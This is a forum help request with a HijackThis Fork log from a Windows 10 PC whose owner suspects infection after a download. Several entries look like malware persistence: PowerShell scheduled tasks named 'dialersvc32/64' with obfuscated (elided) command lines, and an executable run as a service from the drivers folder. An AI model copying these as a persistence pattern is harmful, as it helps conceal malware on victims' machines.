Hi guys, I found some PayPal pages open, and it happened shortly after I downloaded a file... I followed the steps as you explain them and I'm posting the HJT log: THANKS A LOT!! IN YOUR OPINION, WOULD IT BE BETTER TO FORMAT?
Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.13
Platform: x64 Windows 10 (Pro), 10.0.19045.3086 (ReleaseId: 2009, 22H2), Service Pack: 0
Time: 27.06.2023 - 23:46 (UTC+02:00)
Language: OS: Italian (0x410). Display: Italian (0x410). Non-Unicode: Italian (0x410)
Elevated: Yes
Ran by: hopon (group: Administrators) on DESKTOP-GT110CG, FirstRun: no
Firefox: 114.0.2.8570
Internet Explorer: 11.0.19041.1566
Default: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%1" (Firefox)
Boot mode: Normal
Running processes:
Number | Path
1 C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe
1 C:\Program Files (x86)\ExpressVPN\xvpnd\xvpnd.exe
1 C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
1 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
1 C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
2 C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
2 C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
1 C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
1 C:\Program Files\WindowsApps\Microsoft.YourPhone_1.23042.108.0_x64__8wekyb3d8bbwe\PhoneExperienceHost.exe
1 C:\Program Files\WindowsApps\Microsoft.ZuneMusic_11.2304.2.0_x64__8wekyb3d8bbwe\Microsoft.Media.Player.exe
1 C:\Users\hopon\Downloads\hijackthis-2.10.0.13-installer.exe
1 C:\Windows\explorer.exe
1 C:\Windows\ImmersiveControlPanel\SystemSettings.exe
1 C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
1 C:\Windows\System32\ApplicationFrameHost.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
2 C:\Windows\System32\dllhost.exe
1 C:\Windows\System32\drivers\AdminService.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\igfxCUIService.exe
1 C:\Windows\System32\igfxEM.exe
1 C:\Windows\System32\igfxHK.exe
1 C:\Windows\System32\igfxTray.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\oobe\UserOOBEBroker.exe
5 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchFilterHost.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SearchProtocolHost.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\SecurityHealthSystray.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\spoolsv.exe
74 C:\Windows\System32\svchost.exe
2 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\System32\WUDFHost.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
O2-32 - HKLM\..\BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2-32 - HKLM\..\BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O4 - HKCU\..\Run: [Microsoft Edge Update] = C:\Users\hopon\AppData\Local\Microsoft\EdgeUpdate\1.3.175.29\MicrosoftEdgeUpdateCore.exe
O4 - HKCU\..\StartupApproved\Run: [com.messenger] = C:\Users\hopon\AppData\Local\Programs\Messenger\Messenger.exe messenger://openAtLogin (2023/03/18)
O4 - HKCU\..\StartupApproved\Run: [MicrosoftEdgeAutoLaunch_3B883C8A669759C07FF05476B1832F7D] = C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --no-startup-window --win-session-start /prefetch:5 (2023/03/18)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Append to existing PDF: (default) = C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Convert link target to Adobe PDF: (default) = C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Convert link target to existing PDF: (default) = C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Convert to Adobe PDF: (default) = C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (file missing)
O17 - DHCP DNS 1: 192.168.1.1
O20 - HKLM\..\Windows: [AppInit_DLLs] = C:\WINDOWS\system32\acaptuser64.dll (disabled by SecureBoot)
O20-32 - HKLM\..\Windows: [AppInit_DLLs] = acaptuser32.dll (file missing) (disabled by SecureBoot)
O22 - BITS Job: (download) {17311897-CA6B-49A4-A595-FBD7ADB59052} - https://download-installer.cdn.mozilla.net/pub/firefox/releases/113.0.1/update/win64/it/firefox-112.0.2-113.0.1.partial.mar -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\updates\downloading\update.mar
O22 - BITS Job: (download) {2BCCD00F-4AA8-4CF4-9304-9CE9A9F198E8} - https://download-installer.cdn.mozilla.net/pub/firefox/releases/113.0.1/update/win64/it/firefox-112.0.2-113.0.1.partial.mar -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\updates\downloading\update.mar
O22 - BITS Job: (download) {B4C74C95-4F95-4A4E-AA15-F178C31663FF} - https://download-installer.cdn.mozilla.net/pub/firefox/releases/112.0.2/update/win64/it/firefox-112.0.1-112.0.2.partial.mar -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\updates\downloading\update.mar
O22 - BITS Job: (download) {C950926D-46EA-41ED-93E4-83341C6CD12E} - https://download-installer.cdn.mozilla.net/pub/firefox/releases/113.0/update/win64/it/firefox-112.0.2-113.0.partial.mar -> C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\updates\downloading\update.mar
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-1899887094-371431486-2153575249-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Clip\LicenseImdsIntegration - C:\WINDOWS\system32\fclip.exe (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Autopilot\DetectHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},DetectHardwareChange - C:\Windows\System32\Autopilot.dll (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Autopilot\RemediateHardwareChange - {62B2DD2C-F129-42EE-BF59-55D3FD21C215},RemediateHardwareChange - C:\Windows\System32\Autopilot.dll (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Meta\Messenger-SL-Helper-S-1-5-21-1899887094-371431486-2153575249-1001 - C:\Users\hopon\AppData\Local\Programs\Messenger\MessengerHelper.exe --lassie
O22 - Task: \Microsoft\Office\Office Performance Monitor - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\operfmon.exe (Microsoft)
O22 - Task: \Microsoft\Windows\PI\SecureBootEncodeUEFI - C:\WINDOWS\system32\SecureBootEncodeUEFI.exe (Microsoft)
O22 - Task: \Microsoft\Windows\WindowsUpdate\RUXIM\PLUGScheduler - C:\Program Files\RUXIM\PLUGscheduler.exe (Microsoft)
O22 - Task: \Mozilla\Firefox Background Update 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
O22 - Task: \Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB - C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
O22 - Task: dialersvc32 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe [obfuscated PowerShell command line elided]
O22 - Task: dialersvc64 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe [obfuscated PowerShell command line elided]
O22 - Task: FreedomeHelper - C:\Program Files (x86)\F-Secure\Freedome\FHelper.exe (file missing)
O22 - Task: GoogleUpdateTaskMachineQC - C:\Program Files\Google\Chrome\updater.exe (file missing)
O22 - Task: MicrosoftEdgeUpdateTaskUserS-1-5-21-1899887094-371431486-2153575249-1001Core{C73AB81E-3916-49D5-BCEA-ADB09B5196F0} - C:\Users\hopon\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c
O22 - Task: MicrosoftEdgeUpdateTaskUserS-1-5-21-1899887094-371431486-2153575249-1001UA{8A1D8DAD-C112-453D-9F55-10F6E5FAE916} - C:\Users\hopon\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /ua /installsource scheduler
O22 - Task: OneDrive Reporting Task-S-1-5-21-1899887094-371431486-2153575249-1001 - C:\Users\hopon\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
O22 - Task: RtHDVBg - C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /MAXX4
O22 - Task: RtHDVBg_ListenToDevice - C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /AECBYLISTENTOSTATUS
O22 - Task: RTKCPL - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
O23 - Service R2: AtherosSvc - C:\WINDOWS\System32\drivers\AdminService.exe
O23 - Service R2: ExpressVPN Service - (ExpressVPNService) - C:\Program Files (x86)\ExpressVPN\bootstrap\amd64\nssm.exe
O23 - Service R2: Intel(R) HD Graphics Control Panel Service - (igfxCUIService1.0.0.0) - C:\WINDOWS\system32\igfxCUIService.exe
O23 - Service R2: Malwarebytes Service - (MBAMService) - C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
O23 - Service R2: NVIDIA Display Container LS - (NVDisplay.ContainerLocalSystem) - C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
O23 - Service S2: Launcher Service: player - (player) - C:\ProgramData\playersclub\LaunchServ.exe
O23 - Service S3: FLEXnet Licensing Service - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service S3: Intel(R) Content Protection HECI Service - (cphs) - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service S3: Mozilla Maintenance Service - (MozillaMaintenance) - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service S3: Office 64 Source Engine - (ose64) - c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
--
End of file - Time spent: 32,8 sec. - 44854 bytes, CRC32: FFFFFFFF.